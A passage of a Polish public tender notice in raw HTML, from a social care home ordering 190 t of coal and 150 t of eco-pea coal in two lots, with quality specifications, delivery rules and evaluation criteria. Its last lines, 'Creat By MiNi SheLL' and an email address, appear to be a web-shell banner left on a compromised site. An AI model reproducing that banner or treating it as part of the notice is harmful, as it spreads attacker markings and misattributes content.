            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy opału </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>załącznik nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem  zamówienia  jest  sukcesywna  dostawa  węgla  orzech  gat. I  i  eko-groszku   dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie   i  filią 
w  Leśnicy  ul. Strażacka  8.  
Zamawiający  dopuszcza  składanie  ofert  częściowych,  obejmujących  jedną  lub  dwie  części  zadania.  Wykonawca  może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia. 
Zamówienie  składa  się  z  dwóch  części:
I  część  -  zadanie  pod  nazwą:  Sukcesywna  dostawa  węgla  orzech  gat. I  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy
ul. Strażacka  8.  
 
                                              
Część  I  - Węgiel  orzech  gat. I   -  w  ilości  190t  -  Załącznik  nr  2  (dostawa do  DPS  Filia  Szymiszów  ul. Strzelecka   2)
Parametry:
               -  typ  31.1  lub  31.2  lub  32.1
               -  granulacja  węgla  40-120mm,
-  wartość  opałowa  powyżej  29.000kJ/kg
-  zawartość  popiołu  do  7%
-  zawartość  siarki  do  0,8%
               -  wilgotność  mniejsza  niż  6%
  


Realizacja  zamówienia  będzie  następować  zgodnie  z  zasadami  dla  części I Wykonawca  zobowiązuje  się  dostarczyć  asortyment  umowy  własnym   
transportem  do  Filii DPS w Szymiszowie, ul.  Strzelecka  2 (  samochodami  o  dowolnym  tonażu )  w  ilości  odpowiednio  podanej  w  załączniku  nr  2  w  dniach  roboczych  (od  poniedziałku  do  soboty)  w  godzinach  od  7 00 -14 00 na    zasadach:
a)  asortyment  zamawianej  dostawy  będzie  uzgadniany  sukcesywnie  telefonicznie, faxem    
lub  drogą  elektroniczną  co najmniej  na  trzy  dni  robocze  przed  dostawą,
b)  palacz  zmianowy  obecny  przy  odbiorze  przedmiotu  zamówienia 
(wyrywkowe   sprawdzenie  ilości  i  pobieranie  próbek  do  jakości  opału),  
c) węgiel  składowany  jest  w  piwnicy- kotłowni  zamawiającego,  
d)  wykonawca  zapewnia  dobrą  jakość  opału,  
e)  zamawiający  zastrzega  sobie możliwość wyrywkowego  sprawdzenia  wagi 
dostarczonego opału,  dojazd  i  koszt  ważenia  do niezależnego  punktu  wagowego  na  koszt  wykonawcy,
f)  DPS  posiada  prawo  do  kontroli  jakości  realizowanych  dostaw  zgodnie
z parametrami  określonymi  w  pkt. 3  SIWZ  poprzez:  zażądanie  od  Wykonawcy   badań  przeprowadzonych  przez  podmiot  posiadający  stosowne  akredytacje,  bądź  oddać  próbkę  do  badań  przez  podmiot  posiadający  stosowne  akredytacje, 
g)  DPS  ma  prawo  do  weryfikacji  badań  przedłożonych  przez  Wykonawcę,  
o  których  mowa  w  pkt. 3 f  ,  dostarczonych  przez  Wykonawcę  -  przy czym  próbka   ta  do  badań  przeprowadzanych  na  zlecenie  Wykonawcy,  jak i  DPS  -  pobierana   będzie  z  dostawy  przy  obecności  obu  stron  lub  wyznaczonych przedstawicieli,
h)  każde  z  badań  węgla  gat. I   wykonywane  jest  na  koszt  wykonawcy,   
i)  w  przypadku,  gdy  badania  o  których  mowa  pkt.  f  i  g  potwierdzą ,  iż  dostawa  została  dokonana  z  naruszeniem  postanowień  pkt. 3  SIWZ   Wykonawca  zobowiązany  jest  wg  wyboru  DPS:
i. 1  zabrać z  piwnicy  kotłowni  dokonaną  dostawę  obarczoną  wadą  i  dostarczyć  właściwą  dostawę  o takiej  samej  ilości,  spełniająca  wymogi  określone  w  pkt. 3  SIWZ  lub
 i. 2 obniżyć  cenę  tej części  dostawy, w  której  wadę  wykryto o 20%  oferowanej      
 ceny.     
 j)   dostarczenie  certyfikatów  na  adres  DPS  nie  później  niż  w  ciągu  7  dni  po  
 każdej  dostawie  opału,    
 k)   fakturowanie  odbywać  się będzie po  każdorazowej  dostawie,
 l)  wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie 
 obowiązywania  umowy,
 ł)   zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości.
m)Dom Pomocy Społecznej jest  wymieniony  w  katalogu  zwolnień  z  podatku  akcyzowego  -  jako  podmiot  wymieniony  wprost  w  art. 6 ust. 5 ustawy  o  pomocy  społecznej.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09111000-0, 24311800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy opału</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>załącznik nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem  zamówienia  jest  sukcesywna  dostawa  węgla  orzech  gat. I  i  eko-groszku   dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie   i  filią 
w  Leśnicy  ul. Strażacka  8.  
Zamawiający  dopuszcza  składanie  ofert  częściowych,  obejmujących  jedną  lub  dwie  części  zadania.  Wykonawca  może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia. 
II  część   -  zadanie  pod  nazwą:  Sukcesywna  dostawa  eko-groszku  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy
ul. Strażacka  8.  
Część  II:  węgiel  kamienny  eko-groszek  płukany  w  ilości  150t  -  Załącznik  nr  3   (dostawa  do  DPS  Filia  Leśnica  ul. Szpitalna  20)
 Parametry:
              -      wartość  opałowa  powyżej  26 000kJ/kg 
-	granulacja  węgla  5-25 mm
-	niskie  pęcznienie  (węgiel  nie  zlepia  się  w  czasie  spalania)
-	zawartość  siarki  do  0,6%,
-	zawartość  popiołu  do  7,0%,
-	wilgotność  mniejsza  niż  10%,
               -     typ  31.1  lub  31.2  lub  32.1
               -     zawartość  miału  do  5% (granulacja  ziarna  poniżej  4mm).

Wykonawca  zobowiązuje  się  dostarczyć  asortyment  umowy  własnym   
transportem  do  Filii DPS w  Leśnicy, ul.  Szpitalna  20 (  samochodami  o  tonażu  nie  przekraczającym  8t  bez  przyczep  i  naczep)  w  ilości  odpowiednio  podanej  w  załączniku  nr  3  w  dniach  roboczych  (od  poniedziałku  do  soboty)  w  godzinach  od  7 00 -14 00 na    zasadach:
a)  asortyment  zamawianej  dostawy  będzie  uzgadniany  sukcesywnie  telefonicznie, faxem    
lub  drogą  elektroniczną  co najmniej  na  dwa  dni  przed  dostawą,
b)  palacz  zmianowy  obecny  przy  odbiorze  przedmiotu  zamówienia (wyrywkowe   sprawdzenie  ilości  i  pobieranie  próbek  do  jakości  opału),  
c) węgiel  składowany  jest w  piwnicy  -  kotłowni  zamawiającego,
d)  wykonawca  zapewnia  dobrą  jakość  opału,  
e)  zamawiający  zastrzega  sobie możliwość wyrywkowego  sprawdzenia  wagi  dostarczonego opału,  dojazd  i  koszt  ważenia  do niezależnego  punktu  wagowego    
na  koszt  wykonawcy,
f)  DPS  posiada  prawo  do  kontroli  jakości  realizowanych  dostaw  zgodnie  z parametrami  określonymi  w  pkt. 3  SIWZ  poprzez:  zażądanie  od  Wykonawcy   badań  przeprowadzonych  przez  podmiot  posiadający  stosowne  akredytacje,  bądź  oddać  próbkę  do  badań  przez  podmiot  posiadający stosowne  akredytacje, 
g)  DPS  ma  prawo  do  weryfikacji  badań  przedłożonych  przez  Wykonawcę,  
o  których  mowa  w  pkt. 3 f  ,  dostarczonych  przez  Wykonawcę  -  przy czym  próbka  ta    do  badań  przeprowadzanych  na  zlecenie  Wykonawcy,  jak i  DPS  - pobierana   będzie  
z  dostawy  przy  obecności  obu  stron  lub  wyznaczonych  przedstawicieli,
h)  każde  z  badań  eko-groszku  wykonywane  jest  na  koszt  wykonawcy,   
i)  w  przypadku,  gdy  badania  o  których  mowa  pkt.  f  i  g  potwierdzą ,   iż  dostawa  została  dokonana  z  naruszeniem  postanowień  pkt. 3  SIWZ  Wykonawca  zobowiązany  jest  wg  wyboru  DPS:
i. 1  zabrać  z  piwnicy  kotłowni  dokonaną  dostawę  obarczoną  wadą  i  dostarczyć  właściwą  dostawę  o takiej samej  ilości,  spełniająca  wymogi  określone  w  pkt. 3  SIWZ  lub
i. 2  obniżyć  cenę  tej  części  dostawy,  w  której  wadę  wykryto  o  20%  oferowanej      
ceny.     
j)  dostarczenie  certyfikatów  na  adres  DPS  nie  później  niż  w  ciągu  7  dni  po  każdej  dostawie  opału,    
k)  fakturowanie  odbywać  się będzie po  każdorazowej  dostawie,
l)  wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie 
obowiązywania  umowy,
ł)  zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości.
m)Dom Pomocy Społecznej jest  wymieniony  w  katalogu  zwolnień  z  podatku  akcyzowego  -  jako  podmiot  wymieniony  wprost  w  art. 6 ust. 5 ustawy  o  pomocy  społecznej.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>24311800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 18/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin dostawy opału</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com